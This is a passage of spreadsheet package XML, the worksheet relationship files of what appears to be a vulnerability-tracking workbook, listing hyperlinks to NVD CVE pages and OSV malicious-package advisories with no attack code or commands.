Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20540" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20541" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20542" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20543" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20544" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20579" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20586" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20587" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20588" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20589" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78371" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84169" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17472" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17473" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17474" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17475" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17476" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17477" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17478" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17479" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17480" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17481" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17482" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17483" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17484" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17485" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17486" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17487" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17488" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17489" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17490" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17491" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17492" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17493" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17494" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17495" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17496" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17497" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17498" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17499" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17500" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17501" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17502" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17503" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17504" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17505" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17506" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17507" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17508" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17509" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17510" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17511" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17512" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17513" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17514" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17515" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17516" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17517" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17518" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17519" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17520" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17521" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17522" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17523" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17524" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17525" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17526" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17527" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17528" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17529" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17530" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17531" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17532" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17533" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17534" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17535" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17536" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17537" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17538" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17539" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17540" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17541" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17542" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17543" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17544" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17545" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17546" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17547" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17548" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17549" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17550" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17551" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17552" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17553" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17554" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17555" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17556" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17557" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17558" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17559" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17560" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17561" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17562" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17563" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17564" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17565" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17566" TargetMode="External" Id="rId222" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88779" TargetMode="External" Id="rId1" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88779" TargetMode="External" Id="rId1" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105207" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105209" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103355" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105215" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105086" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105089" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105210" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105213" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105211" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105293" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105220" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105208" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105212" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105219" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105295" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97307" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105216" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105218" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105221" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105222" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105223" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105294" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105147" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105148" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105149" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105158" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105166" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105167" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105169" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105170" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105172" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105175" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105182" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105183" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105184" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105185" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105229" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105230" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105231" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105232" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105238" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105246" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103062" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103344" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103354" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97276" TargetMode="External" Id="rId46" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105223" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105306" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105302" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105301" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88779" TargetMode="External" Id="rId5" /></Relationships>
</file>

